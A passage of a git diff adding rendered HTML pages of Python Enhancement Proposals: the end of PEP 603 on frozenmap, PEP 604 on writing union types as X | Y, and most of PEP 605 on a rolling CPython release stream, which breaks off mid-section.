The lower-case “frozenmap” resonates well with the frozenset +built-in as well as with types like collections.defaultdict.

+
+
+

Why “frozenmap” and not “frozendict”

+

“Dict” has a very specific meaning in Python:

+
    +
  • a dict is a concrete implementation of abc.MutableMapping with +O(1) get and set operations (frozenmap has O(log N) complexity);
  • +
  • Python dicts preserve insertion order.
  • +
+

The proposed frozenmap does not have either of these properties. Instead, frozenmap has an O(log N) cost for set/get operations, and it only implements the abc.Mapping protocol.

+
+
+
+

Implementation

+

The full implementation of the proposed frozenmap type is +available at [2]. The package includes C and pure Python +implementations of the type.

+

See also the HAMT collection implementation as part of the +CPython project tree here: [1].

+
+
+

References

+ +
+
+

Acknowledgments

+

I thank Carol Willing, Łukasz Langa, Larry Hastings, and +Guido van Rossum for their feedback, ideas, edits, and discussions +around this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0603.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0604/index.html b/pep-0604/index.html new file mode 100644 index 00000000000..a0474a70d09 --- /dev/null +++ b/pep-0604/index.html @@ -0,0 +1,385 @@ + PEP 604 – Allow writing union types as X | Y | peps.python.org +
+
+


+ + +
+
+
+

PEP 604 – Allow writing union types as X | Y

+
+
Author:
+
Philippe PRADOS <python at prados.fr>, Maggie Moss <maggiebmoss at gmail.com>
+
Sponsor:
+
Chris Angelico <rosuav at gmail.com>
+
BDFL-Delegate:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Typing-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
28-Aug-2019
+
Python-Version:
+
3.10
+
Post-History:
+
28-Aug-2019, 05-Aug-2020
+
+
+
+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Union Type.

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP proposes overloading the | operator on types to allow +writing Union[X, Y] as X | Y, and allows it to appear in +isinstance and issubclass calls.

+
+
+

Motivation

+

PEP 484 and PEP 526 propose a generic syntax to add typing to variables, +parameters and function returns. PEP 585 proposes to expose +parameters to generics at runtime. +Mypy [1] accepts a syntax which looks like:

+
annotation: name_type
+name_type: NAME (args)?
+args: '[' paramslist ']'
+paramslist: annotation (',' annotation)* [',']
+
+
+
    +
  • To describe a disjunction (union type), the user must use Union[X, Y].
  • +
+

The verbosity of this syntax does not help with type adoption.

+
+
+

Proposal

+

Inspired by Scala [2] and Pike [3], this proposal adds operator +type.__or__(). With this new operator, it is possible to write +int | str instead of Union[int, str]. In addition to +annotations, the result of this expression would then be valid in +isinstance() and issubclass():

+
isinstance(5, int | str)
+issubclass(bool, int | float)
+
+
+

We will also be able to write t | None or None | t instead of +Optional[t]:

+
isinstance(None, int | None)
+isinstance(42, None | int)
+
+
+
+
+

Specification

+

The new union syntax should be accepted for function, variable and parameter annotations.

+
+

Simplified Syntax

+
# Instead of
+# def f(list: List[Union[int, str]], param: Optional[int]) -> Union[float, str]
+def f(list: List[int | str], param: int | None) -> float | str:
+    pass
+
+f([1, "abc"], None)
+
+# Instead of typing.List[typing.Union[str, int]]
+typing.List[str | int]
+list[str | int]
+
+# Instead of typing.Dict[str, typing.Union[int, float]]
+typing.Dict[str, int | float]
+dict[str, int | float]
+
+
+

The existing typing.Union and | syntax should be equivalent.

+
int | str == typing.Union[int, str]
+
+typing.Union[int, int] == int
+int | int == int
+
+
+

The order of the items in the Union should not matter for equality.

+
(int | str) == (str | int)
+(int | str | float) == typing.Union[str, float, int]
+
+
+

Optional values should be equivalent to the new union syntax.

+
None | t == typing.Optional[t]
+
+
+

A new Union.__repr__() method should be implemented.

+
str(int | list[str])
+# int | list[str]
+
+str(int | int)
+# int
+
+
+
+
+

isinstance and issubclass

+

The new syntax should be accepted for calls to isinstance and issubclass as long as the Union items are valid arguments to isinstance and issubclass themselves.

+
# valid
+isinstance("", int | str)
+
+# invalid
+isinstance(2, list[int]) # TypeError: isinstance() argument 2 cannot be a parameterized generic
+isinstance(1, int | list[int])
+
+# valid
+issubclass(bool, int | float)
+
+# invalid
+issubclass(bool, bool | list[int])
+
+
+
+
+
+

Incompatible changes

+

In some situations, some exceptions will not be raised as expected.

+

If a metaclass implements the __or__ operator, it will override this:

+
>>> class M(type):
+...     def __or__(self, other): return "Hello"
+...
+>>> class C(metaclass=M): pass
+...
+>>> C | int
+'Hello'
+>>> int | C
+typing.Union[int, __main__.C]
+>>> Union[C, int]
+typing.Union[__main__.C, int]
+
+
+
+
+

Objections and responses

+

For more details about discussions, see links below:

+ +
+

1. Add a new operator for Union[type1, type2]?

+

PROS:

+
    +
  • This syntax can be more readable, and is similar to other languages (Scala, …)
  • +
  • At runtime, int|str might return a simple object in 3.10, rather than everything that +you’d need to grab from importing typing
  • +
+

CONS:

+
    +
  • Adding this operator introduces a dependency between typing and builtins
  • +
  • Breaks the backport (in that typing can easily be backported but core types can’t)
  • +
  • If Python itself doesn’t have to be changed, we’d still need to implement it in mypy, Pyre, PyCharm, Pytype, and who knows what else (it’s a minor change; see “Reference Implementation”)
  • +
+
+
+

2. Change only PEP 484 (Type hints) to accept the syntax type1 | type2 ?

+

PEP 563 (Postponed Evaluation of Annotations) is enough to accept this proposition, if we accept not being compatible with the dynamic evaluation of annotations (eval()).

+
>>> from __future__ import annotations
+>>> def foo() -> int | str: pass
+...
+>>> eval(foo.__annotations__['return'])
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+  File "<string>", line 1, in <module>
+TypeError: unsupported operand type(s) for |: 'type' and 'type'
+
+
+
+
+

3. Extend isinstance() and issubclass() to accept Union ?

+
isinstance(x, str | int) ==> "is x an instance of str or int"
+
+
+

PROS:

+
    +
  • If they were permitted, then instance checking could use an extremely clean-looking notation
  • +
+

CONS:

+
    +
  • Must migrate all of the typing module into builtins
  • +
+
+
+
+

Reference Implementation

+

A new built-in Union type must be implemented to hold the return +value of t1 | t2, and it must be supported by isinstance() and +issubclass(). This type can be placed in the types module. +Interoperability between types.Union and typing.Union must be +provided.

+

Once the Python language is extended, mypy [1] and other type checkers will +need to be updated to accept this new syntax.

+ +
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0604.rst

+

Last modified: 2024-02-16 17:06:07 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0605/index.html b/pep-0605/index.html new file mode 100644 index 00000000000..7acc863afc6 --- /dev/null +++ b/pep-0605/index.html @@ -0,0 +1,1419 @@ + PEP 605 – A rolling feature release stream for CPython | peps.python.org +
+
+


+ + +
+
+
+

PEP 605 – A rolling feature release stream for CPython

+
+
Author:
+
Steve Dower <steve.dower at python.org>, Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Informational
+
Created:
+
20-Sep-2019
+
Python-Version:
+
3.9
+
Post-History:
+
01-Oct-2019, 06-Oct-2019, 20-Oct-2019
+
+
+
+
+
+

Rejection Notice

+

This PEP was rejected in favour of PEP 602. The potential alpha/beta alternation +was deemed too confusing and the two year cadence between releases deemed too +long.

+
+
+

Abstract

+

For a long time, CPython’s nominal feature release cadence has been “every 18-24 +months”, and in recent years, has been pretty consistently on the “18 month” +end of that window. PEP 607 provides some common background on the problems +that arise due to that choice of cadence, as well as some of the risks that +need to be accounted for when proposing to change it.

+

The proposal in this PEP aims to allow CPython’s user base to self-select into +two distinct but overlapping groups:

+
    +
  • users of stable feature releases (and their associated maintenance release +streams) that are published every 24 months; and
  • +
  • early adopters of a new rolling release stream that takes the place of the +previous CPython pre-release process
  • +
+

As part of this proposal, the usage guidance given for beta releases would +become “suitable for production use only in environments with sufficiently +robust compatibility testing and operational monitoring capabilities”, rather +than the currently unqualified “not for production use”.

+

Similarly, the guidance given for alpha releases would be amended to state +“intended for library compatibility testing and the creation of ABI compatible +binary artifacts”, rather than simply saying “not for production use”.

+

The PEP authors believe these outcomes can be achieved by amending CPython’s +pre-release management process as described in the Proposal section below.

+

This PEP also proposes that the frequency of X.Y.0 releases be adjusted to +begin each new release series in August every two years (starting in 2021, +around two years after the release of Python 3.8.0).

+
+
+

Example Future Release Schedules

+

Under this proposal, Python 3.9.0a1 would be released in December 2019, two +months after the Python 3.8.0 baseline feature release in October 2019.

+

Assuming no further breaking changes were made to the full CPython ABI, the +3.9.0b2 release would then follow 2 months later in February 2020, continuing +through to 3.9.0b9 in April 2021.

+

Any time a breaking change to the full CPython ABI was introduced, the first +pre-release that included it would be marked as an alpha release.

+

3.9.0rc1 would be published in June 2021, 3.9.0rc2 in July 2021, and then +the full release published as 3.9.0 in August 2021.

+

The cycle would start over again in October 2021, with the publication +of 3.10.0a1 (4 months after the creation of the 3.9.x maintenance branch).

+

The exact schedule of maintenance releases would be up to the release team, +but assuming maintenance releases of 3.9.x were also to occur every other month +(offset from the 3.10.0 beta releases), the overall release timeline +would look like:

+
    +
  • 2019-12: 3.9.0a1
  • +
  • 2020-02: 3.9.0b2
  • +
  • … beta (or alpha) releases every other month
  • +
  • 2021-04: 3.9.0b9
  • +
  • 2021-06: 3.9.0rc1 (feature freeze, ABI freeze, pyc format freeze)
  • +
  • 2021-07: 3.9.0rc2
  • +
  • 2021-08: 3.9.0
  • +
  • 2021-09: 3.9.1, 3.8.x (final 3.8.x binary maintenance release)
  • +
  • 2021-10: 3.10.0a1
  • +
  • 2021-11: 3.9.2
  • +
  • 2021-12: 3.10.0b2
  • +
  • … beta (or alpha) and maintenance releases continue in alternate months
  • +
  • 2023-04: 3.10.0b10
  • +
  • 2023-05: 3.9.11
  • +
  • 2023-06: 3.10.0rc1 (feature freeze, ABI freeze, pyc format freeze)
  • +
  • 2023-07: 3.10.0rc2, 3.9.12
  • +
  • 2023-08: 3.10.0
  • +
  • 2023-09: 3.10.1, 3.9.13 (final 3.9.x binary maintenance release)
  • +
  • 2023-10: 3.11.0a1
  • +
  • 2023-12: 3.11.0b2
  • +
  • … etc
  • +
+

If we assume two additional pre-releases were made that introduced breaking +changes to the full CPython ABI in the 3.9.0a5 and 3.9.0a7 releases, then the +overall calendar would look like:

+
+../_images/pep-0605-example-release-calendar.png + +
+

Figure 1. Impact of the pre-release process changes on the calendar.

+
+
+

There are always two or three active maintenance branches in this model, +which preserves the status quo in that respect. The major difference is that +we would start encouraging publishers to provide pre-built binaries for the +pre-freeze rolling releases in addition to providing them for the stable +maintenance branches.

+
+../_images/pep-0605-overlapping-support-matrix.png + +
+

Figure 2. Testing matrix in the 18-month cadence vs. the 24-month cadence.

+
+
+

Package publishers targeting the full CPython ABI that choose to provide +pre-built binaries for the rolling pre-freeze releases would at least need +to build new wheel archives following the 3.9.0a1 release. Whether they needed +to publish updated binaries after subsequent alpha releases (e.g. 3.9.0a5 or +3.9.0a7 releases in the example timeline) would depend on whether or not they +were actually affected by the ABI breaks in those later releases.

+

As with the status quo, all package publishers wishing to provide pre-built +binaries for the final release will need to build new wheel archives following +the ABI freeze date. Unlike the status quo, this date will be clearly marked +by the publication of the first release candidate, and it will occur early +enough to give publishers a couple of months to get ready for the final release.

+
+
+

Example Future Release Announcements

+

If this PEP is accepted, the primary channels used to communicate the updated +pre-release management process to end users would be the Python 3.9 What’s New +document, and the release announcements themselves.

+

This section provides initial drafts of text that could be used for those +purposes.

+
+

Suggested “What’s New in Python 3.9” Entry

+

The following subsection would be added to the Python 3.9 What’s New document, +and then linked from each of the Python 3.9 alpha and beta announcements.

+
+

PEP 605: Changes to the pre-release management process

+

As detailed in PEP 605, the pre-release management process has been updated to +produce a rolling series of beta releases that are considered suitable for +production use in environments with sufficiently robust integration testing and +operational monitoring capabilities.

+

Under this new rolling model, the alpha and beta releases are intermingled as +part of a combined “pre-freeze” period, with alpha releases indicating breaks +in the full CPython ABI that may require recompilation of extension modules or +embedding applications, and beta releases indicating full binary compatibility +with the immediately preceding pre-release.

+

Unlike previous releases, publishing pre-built binaries for 3.9.0 alpha and beta +releases is actively encouraged, as a new pre-release ABI flag (“p”) is now +set when building and loading extension modules prior to the full CPython ABI +freeze, ensuring that all such pre-freeze extension module builds will be +ignored by post-freeze interpreter builds.

+

The full CPython ABI will be frozen, and the pre-release flag dropped from the +ABI flags, in 3.9.0rc1, which is expected to occur 2 months prior to the final +3.9.0 release (refer to the release schedule in PEP 596 for exact target dates).

+

For application developers, migrating to the rolling release stream provides +the opportunity to be actively involved in the design and development of +enhancements to the standard library and reference interpreter prior to the +next stable release. It also provides the opportunity to benefit from +interpreter performance enhancements up to a year or more before they become +available in a stable release.

+

For library developers that publish pre-built wheel archives, opting in to +supporting the 3.9.x rolling release stream in addition to the 3.8 stable +release series requires no specific action if the project is already publishing +either pure Python wheels (tagged as py3-none-any), or builds against the +stable C ABI (tagged as cp38-abi3-<platform>, or the equivalent from an +earlier CPython 3.x release). These same wheel archives will also be usable on +the subsequent 3.9 stable release series.

+

For library developers that publish pre-built wheel archives that are built +against the full CPython ABI, the binaries for the 3.9 stable release series +will need to be built after the full CPython ABI freeze (i.e. using 3.9.0rc1 or +later).

+

Developers of these libraries may also opt in to supporting the rolling release +stream by building against the 3.9.0a1 release (or a subsequent beta release) +and publishing the result as normal.

+

In the ideal case, binaries built this way will continue working all the way +through to the last pre-freeze release. However, if the project is affected by +a change in the full CPython C ABI during the pre-freeze period, then it will +be necessary to publish a maintenance update that rebuilds the affected binaries +against the alpha release that changed the relevant interface. In these cases, +a corresponding Python-Requires entry should be added to the project +metadata. For example, if a project is affected by an ABI change introduced in +3.9.0a5, then the Python-Requires entry to add would be:

+
Python-Requires: >= "3.9.0b6"; python_version == "3.9" and full_python_version != "3.9.0a5"
+
+
+

(This additional metadata ensures that the updated version won’t be installed on earlier pre-releases in the 3.9 series that offer an older variant of the ABI.)

+

As for application developers, library developers that choose to support the +rolling release stream will have the opportunity to provide feedback on new and +updated API designs before they’re locked down for multiple years in a stable +release (or before they’re included as a provisional API in a stable release +series).

+
+
+
+

Example announcement text for the 3.9.0a1 release

+

This is the first preview release of Python 3.9. As an alpha release, it is +intended for library and application compatibility testing and the creation of +ABI compatible binary artifacts. It is not recommended for use in production +environments.

+
+

Changes to the pre-release management process

+

CPython has switched to a new pre-release management process that is designed +to produce a rolling series of beta releases that are considered suitable for +production use in environments with sufficiently robust integration testing and +operational monitoring capabilities. Refer to the Python 3.9 What’s New +document (hyperlinked to relevant section) for details.

+
+
+

Major new features of the 3.9 series, compared to 3.8

+

Many new features for Python 3.9 are still being planned and written. Among the +major new features and changes already implemented:

+
    +
  • +
  • (Hey, fellow core developer or user of the rolling release stream, if a +feature you find important is missing from this list, let <the release +manager> know.)
  • +
+

The next pre-release of Python 3.9 is expected to be 3.9.0b2, currently scheduled for 2020-02-02.

+
+
+
+

Example announcement text for the 3.9.0b2 release

+

This is the second preview release of Python 3.9. As a beta release, it is +fully binary compatible with the preceding 3.9.0a1 release. It is recommended +for production use only in environments with sufficiently robust integration +testing and operational monitoring capabilities.

+

(Remainder as per 3.9.0a1 announcement, with updates for implemented changes +and the next expected release being 3.9.0b3)

+
+
+

Example announcement text for 3.9.0a5 (a mid-stream alpha release)

+

This is the fifth preview release of Python 3.9. As an alpha release, it is +NOT fully binary compatible with the preceding 3.9.0b4 release. This release is +intended for library and application compatibility testing and the creation of +ABI compatible binary artifacts. It is not recommended for use in production +environments.

+
+

Breaking changes in the full CPython ABI between 3.9.0b4 and 3.9.0a5

+
    +
  • new field ob_example added to the PyObject struct
  • +
  • provisional field tp_example removed from the PyTypeObject struct
  • +
+

Projects that are supporting the rolling release stream and require a rebuild +to restore binary compatibility should add the following metadata to their +updated release:

+
Python-Requires: >= "3.9.0b6"; python_version == "3.9" and full_python_version != "3.9.0a5"
+
+
+

(Remainder as per 3.9.0a1 announcement, with updates for implemented changes +and the next expected release being 3.9.0b6)

+
+
+
+

Example announcement text for 3.9.0rc1

+

This is the first release candidate for Python 3.9. As a release candidate, +this release is now feature complete, the full CPython ABI is now frozen, and +the pre-release marker has been removed from the ABI compatibility flags. It is +recommended for production use only in environments with sufficiently robust +integration testing and operational monitoring capabilities.

+
+

Preparation for the final 3.9.0 release

+

With the full CPython ABI now frozen, library developers targeting that ABI are +encouraged to build and publish binaries for the stable 3.9.x series.

+

Application developers that have not been testing against the rolling release +stream are encouraged to test their applications against the release candidate +and report any compatibility regressions not already mentioned in the Porting +Guide (hyperlinked to relevant What’s New section).

+

A second release candidate is planned for 2021-07-02, and then the final 3.9.0 +release is planned for 2021-08-02.

+
+
+

Major new features of the 3.9 series, compared to 3.8

+

Some of the major new features and changes in this release:

+
    +
  • +
  • (Hey, fellow core developer or user of the rolling release stream, if a +feature you find important is missing from this list, let <the release +manager> know.)
  • +
+
+
+
+
+

Motivation

+

The current CPython pre-release and release management processes were developed +in an era where automated continuous integration and operational monitoring +systems were still relatively immature. Since that time, many organisations +have adopted deployment models that allow them to incorporate new CPython +feature releases without adding substantially more risk than they incur for any +other code change. Newer deployment models, such as lightweight task specific +application containers, also make it easier to combine an application with a +language runtime in a CI pipeline, and then keep them together until the entire +container image is later replaced by an updated one.

+

In light of those changes in the wider environment, PEP 602 has proposed +reducing the feature delivery latency for the Python standard library and +CPython reference interpreter by increasing the frequency of CPython feature +releases from every 18-24 months to instead occur every 12 months.

+

Unfortunately, for many organisations, the cost of adopting a new Python release +doesn’t automatically scale down with a reduced number of changes in the release, +as the primary costs aren’t associated with resolving any discovered issues; +the primary costs are associated with the search for issues. This search may +involve manual testing of software systems, human review of written materials, +and other activities where the time required scales with the size of the +existing system, rather than with the number of changes between the versions of +Python.

+

For third party library developers, costs are primarily associated with the +number of distinct Python versions in widespread usage. This currently tends +to be influenced by a combination of which releases are still actively +maintained by python-dev, and which releases are the latest versions offered +by particular redistributors (with the Debian, Ubuntu LTS, and RHEL/CentOS +system Python versions being particularly popular development targets). In +addition to the basic CI cost of testing against more Python versions, having +more variants in widespread use can make it more difficult to determine when a +fault report is an actual error in the project, or an issue in the reporting +user’s environment.

+

PEP 602 proposes that affected organisations and projects simply switch to +adopting every second or third CPython release, rather than attempting to adopt +every release, but that creates its own set of new problems to be resolved, both +practical (e.g. deprecations would need to cover more than one release if we’re +expecting users to routinely skip releases) and cultural (e.g. with a larger +number of versions in active use, there is a much higher chance that open source +library maintainers will receive bug reports that only occur on Python versions +that they’re not using themselves).

+

PEP 598 was an initial attempt by one of the authors of this PEP to propose +an alternative scheme to reduce feature delivery latency by adopting a +semantic versioning style policy that allowed for the incremental delivery of +backwards compatible features within a release series, until that series +reached feature complete status. That variant still had the undesirable +consequence of imposing visible changes on end users that are happy enough +with the current release management model.

+

This PEP takes the view that both PEP 598 and PEP 602 share a common flaw: they +are attempting to satisfy the needs of two quite distinct audiences within the +constraints of a single release model, which results in conflicting design +requirements, and the need for awkward trade-offs between those conflicting +requirements. The proposal in this PEP aims to avoid that flaw by proposing the +creation of two distinct production-ready release streams, with the existing +release stream being largely left alone, while the new release stream is +tailored towards the audience that would most benefit from a reduction in +feature delivery latency.

+
+
+

Aims of this Proposal

+

The proposal in this PEP arises from making the following key assumptions:

+
    +
  • the vast majority of Python’s users aren’t actively clamouring for new +language and runtime level features, and instead only upgrade when either +the version they were previously using is no longer supported, when their +Python provider switches to offering them a newer version by default, or when +enough changes that are of interest to them have accumulated to make a +compelling case for upgrading
  • +
  • for many users of new releases, much of the work that arises when adopting a +new release doesn’t arise from compatibility issues at the language level, but +from compatibility issues at the component installation level (i.e. filename +and installation path changes)
  • +
  • that there’s a subset of Python’s user base that would be willing to run +production-ready pre-releases (akin to Windows Insider or Debian testing +builds) for at least some of their use cases
  • +
+

The core of the proposal in this PEP is changing the CPython pre-release process +to produce a rolling stream of incremental feature releases at a regular +cadence, and to ensure that most of those builds offer a sufficient level of +stability as to be suitable for use in appropriately managed production systems.

+

By adopting this approach, the proposal aims to provide an improved outcome +for almost all Python users and contributors:

+
    +
  • for users of the new incremental feature release stream, targeting the +pre-release phase allows for even lower feature delivery latency than the +annual cadence proposed in PEP 602;
  • +
  • for core developers working on new features, increased frequency and adoption +of pre-releases should improve pre-release feedback cycles;
  • +
  • for users of the established release stream, the increased adoption and +improved feedback cycles during the pre-release period should result in +increased feature maturity at the time of its first X.Y.0 release, as well +as higher levels of ecosystem readiness;
  • +
  • for Python library maintainers, the rolling stream of pre-releases will +hopefully provide more opportunities to identify and resolve design issues +before they make it into a full stable release than is offered by the current +pre-release management process; and
  • +
  • for developers of alternative Python implementations, the rolling stream of +pre-releases may provide an additional incentive for extension module authors +to migrate from the full CPython ABI to the Python stable ABI, which would +also serve to make more of the ecosystem compatible with implementations that +don’t emulate the full CPython C API.
  • +
+

That said, it is acknowledged that not all the outcomes of this proposal will be +beneficial for all members of the wider Python ecosystem:

+
    +
  • for Python library maintainers, both this PEP and PEP 602 would likely +result in user pressure to support the faster release cadence. While this PEP +attempts to mitigate that by clearly marking which pre-releases include +potentially breaking changes to the full CPython C ABI, and PEP 602 attempts +to mitigate it by keeping the minimum time between full releases at +12 months, it isn’t possible to eliminate this downside completely;
  • +
  • for third party extension module maintainers, both this PEP and PEP 602 would +likely result in user pressure to start supporting the stable ABI in order to +provide wheel archives that work on the new version as soon as it is +available. Whether that’s a net negative or not will depend on how the request +is presented to them (it could be a positive if the request comes in the form +of a courteous contribution to their project from a developer interested in +supporting the rolling pre-freeze releases);
  • +
  • for some users of the established release stream that rely on the +availability of pre-built wheel archives, switching to adopting a new release +every 12 months may be an acceptable rate increase, while moving consistently +to the 24 month end of the historical 18-24 month cadence would be an +undesirable rate reduction relative to the 18-month cycle used for recent +releases. Whether this proposal would be a net negative for these users will +depend on whether or not we’re able to persuade library maintainers that +it’s worth their while to support the upcoming stable release throughout its +pre-freeze period, rather than waiting until its API and ABI have been +frozen.
  • +
+
+
+

Proposal

+

The majority of the proposed changes in this PEP only affect the handling of +pre-release versions. The one change affecting full release versions is a +suggested change to their cadence.

+
+

Two year cadence for stable releases

+

With the rolling pre-freeze releases available to users that are looking to +use leading edge versions of the reference interpreter and standard library, +this PEP proposes that the frequency of X.Y.0 releases be adjusted to publish +a new stable release in August every two years (starting in 2021, +around two years after the release of Python 3.8.0).

+

This change is arguably orthogonal to the proposed changes to the handling of +the pre-freeze release period, but the connection is that without those +pre-release management changes, the downsides of a two-year full release cadence +would probably outweigh the upsides, whereas the opposite is true for a +12-month release cadence (i.e. with the pre-release management changes proposed +in this PEP in place, the downsides of a 12-month full release cadence would +outweigh the upsides).

+
+
+

Merging of the alpha and beta phases into a “pre-freeze” phase

+

Rather than continuing the status quo where the pre-release alpha and beta +phases are distinct and sequential, this PEP proposes that they instead be +combined into a single “pre-freeze” phase with a monotonically increasing serial +number on the releases.

+

Rather than denoting distinct phases, the “alpha” and “beta” names would +instead indicate whether or not the release contains breaking changes to the +full CPython C ABI:

+
    +
  • “alpha” releases would be “ABI breaking” releases where extension modules +built against the full CPython ABI in the preceding pre-release are not +necessarily going to load correctly
  • +
  • “beta” releases would be “binary compatible” releases, where extension modules +built against the full CPython ABI in the preceding pre-release are expected +to load correctly, as long as those modules abide by the following additional +criteria:
      +
    • the module must not be using any provisional or private C APIs (either from +the previous stable release series, or the in development pre-release series) +that were removed in this beta release, or were changed in an ABI incompatible +way
    • +
    • the module must not be using any C APIs that were deprecated in the previous +stable release series, and removed in this beta release
    • +
    +
  • +
+
+

Pre-freeze phase duration and cadence

+

Rather than being released monthly for a period of a few months while preparing +a new X.Y.0 release, pre-freeze releases would instead be consistently published +every two months.

+

The only time this would not be the case is during the two month release +candidate period for an upcoming X.Y.0 release (see the release candidate +section below for more details). This means two otherwise scheduled releases +would be skipped (one corresponding with the first release candidate date, one +with the final release date).

+

The pre-freeze phase would typically be expected to start 2 months after the +preceding stable X.Y.0 release.

+

The first pre-freeze release for any new release series will always be X.Y.0a1 +(as there is no preceding release with the same ABI version markers to judge +binary compatibility against).

+

Pre-freeze releases would gain an additional flag in their C ABI compatibility +markers to avoid binary compatibility issues with the eventual stable release.

+
+
+

Release policy for beta releases

+

This PEP proposes that the policy for beta releases be set as follows:

+
    +
  • as with current beta releases, the stable BuildBot fleet is expected to be +green prior to preparation and publication of the beta release
  • +
  • as with current beta releases, the release manager is expected to review +open release blocker issues prior to preparation and publication of the beta +release
  • +
  • as with current beta releases, any additions to the abi3 stable C ABI would +be expected to become a permanent part of that ABI unless and until that +stable ABI version is retired completely (Note: there are no current plans +to increment the stable ABI version)
  • +
  • unlike current beta releases, beta releases under this PEP would not be +considered feature complete for the next X.Y.0 release
  • +
  • unlike current beta releases, all APIs added since the last CPython feature +release (other than additions to the stable C ABI) would be considered +provisional
  • +
  • unlike current beta releases, beta releases under this PEP would be prepared +and published from the master development branch
  • +
  • unlike current alpha or beta releases, beta releases under this PEP would be +required to be fully ABI compatible with the immediately preceding pre-release +in the series (excluding any changes to provisional APIs, or the removal of +APIs that were deprecated in the previous release series)
  • +
+
+
+

Release policy for alpha releases

+

This PEP proposes that the policy for alpha releases be set as follows:

+
    +
  • as with current alpha releases, the stable BuildBot fleet is expected to be +green prior to preparation and publication of the alpha release
  • +
  • as with current alpha releases, the release manager is expected to review open release blocker issues prior to preparation and publication of the alpha release
  • +
  • unlike current alpha releases, the release manager would be expected to target a similar level of stability to the current beta releases, even for the alpha releases
  • +
+

Under this PEP, an alpha release would be published whenever it isn’t possible +to publish a release that satisfies the criteria for a beta release, and +allowing some additional time before making the release won’t resolve the issue.

+

It is expected that the full CPython API changing in a way that breaks ABI compatibility (for example, a field may have been added to or removed from a public struct definition) will be the most likely reason for publishing additional alpha releases beyond the initial X.Y.0a1 release (which defines the compatibility tags), but the decision for any particular release rests with the release manager.

+
+
+
+

Release candidate policy, phase duration, and cadence

+

Given the proposed changes to the alpha and beta release phases, the release +candidate phase would see the following related adjustments:

+
    +
  • Feature freeze, ABI freeze, pyc file format freeze, and maintenance branch +creation would all correspond with the creation of X.Y.0rc1 (currently these +occur across a mixture of X.Y.0b1, the last beta release, and X.Y.0rc1)
  • +
  • The X.Y.0 release candidate period would be extended from 3 weeks to 2 months
  • +
  • There would normally be two release candidates issued a month apart, but +additional candidates may be published at the release manager’s discretion
  • +
  • The final X.Y.0 release would occur between 1 and 4 weeks after the final +release candidate (depending if additional release candidates were needed +after the second)
  • +
  • If the final X.Y.0 release is delayed beyond the August target date, the +subsequent release series is not affected, and will still be scheduled for +August (now slightly less than two years later).
  • +
+

In addition to allowing more time for end user feedback on the release +candidate, this adjusted policy also provides additional time for maintainers +of Python projects to build and publish pre-built wheel archives for the new +stable release series, significantly improving the initial user experience of +the X.Y.0 release.

+
+
+

Changes to management of the CPython stable C ABI

+

The CPython stable ABI [5] makes the commitment that binary extension modules +built against any particular CPython release will continue to work on future +CPython releases that support the same stable ABI version (this version is +currently abi3).

+

Under the proposed rolling pre-freeze release model, this commitment would be +extended to also apply to the beta releases: once an intentional addition to the +abi3 stable ABI for the upcoming Python version has been shipped in a beta +release, then it will not be removed from future releases for as long as the +abi3 stable ABI remains supported.

+

Two main mechanisms will be available for obtaining community feedback on +additions to the stable ABI:

+
    +
  • the preferred mechanism will be to add new APIs to the full CPython API first, +and only promote them to the stable ABI after they have been included in at +least one published beta release and received relevant user feedback
  • +
  • for APIs where that approach is unavailable for some reason (e.g. some API +additions may serve no useful purpose when the full CPython API is available), +then developers may request that the release manager mark the next release +as an alpha release (even in the absence of an ABI break in the full CPython +API), and attempt to obtain further feedback that way
  • +
+

As a slight readability and usability improvement, this PEP also proposes the +introduction of aliases for each major stable ABI version:

+
#define Py_LIMITED_API_3_3 0x03030000
+#define Py_LIMITED_API_3_4 0x03040000
+#define Py_LIMITED_API_3_5 0x03050000
+#define Py_LIMITED_API_3_6 0x03060000
+#define Py_LIMITED_API_3_7 0x03070000
+#define Py_LIMITED_API_3_8 0x03080000
+#define Py_LIMITED_API_3_9 0x03090000
+// etc...
+
+
+

These would be used both in extension module code to set the target ABI +version:

+
#define Py_LIMITED_API Py_LIMITED_API_3_8
+
+
+

And also in the CPython interpreter implementation to check which symbols should +be made available:

+
#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= Py_LIMITED_API_3_9
+// A Python 3.9+ addition to the stable ABI would appear here
+#endif
+
+
+

The documentation for the rolling pre-freeze releases and the stable C ABI would +make it clear that extension modules built against the stable ABI in a later +pre-freeze release may not load correctly on an earlier pre-freeze release.

+

The documentation for alpha releases and the stable C ABI would make it clear +that even extension modules built against the stable ABI in an alpha release +may not load correctly on the next release if two alpha releases are published +in a row (this situation would ideally be rare).

+
+
+

Changes to management of the full CPython ABI

+

This PEP proposes two changes to the management of the full CPython ABI.

+
+

An explicit commit and NEWS file convention to mark ABI breaking changes

+

The proposal in this PEP requires that release managers be able to appropriately +mark a pre-freeze release as either an alpha or a beta release based on whether +or not it includes an ABI breaking change.

+

To assist in that process, core developers would be requested to include a +“(CPython ABI break)” marker at the beginning of all NEWS file snippets for +changes that introduce a breaking change in the full CPython C ABI.

+

The “CPython” marker is included to make it clear that these annotations relate +to the full CPython ABI, not the stable ABI.

+

For commit messages, the shorter marker “(ABI break)” would be placed at the +start of the summary line for the commit.

+

The pre-merge bots will be updated to ensure that if the ABI break marker +appears in one of the two locations, it appears in both of them.

+

If the marker is inadvertently omitted from the initial commit message and NEWS +entry, then the commit message marker should be included in the subsequent +commit that adds the marker to the NEWS entry.

+

In addition to being useful for release managers, these markers should also be +useful for developers investigating unexpected segfaults when testing against +the affected release.

+
+
+

Explicitly marking builds against the pre-freeze ABI

+

The full CPython ABI has long operated under a policy where binary +compatibility only applies within a release series after the ABI has been +declared frozen, and only source compatibility applies between different +release series.

+

This policy means that extension modules built against CPython pre-releases +prior to the ABI freeze for that release series may not actually load correctly +on the final release.

+

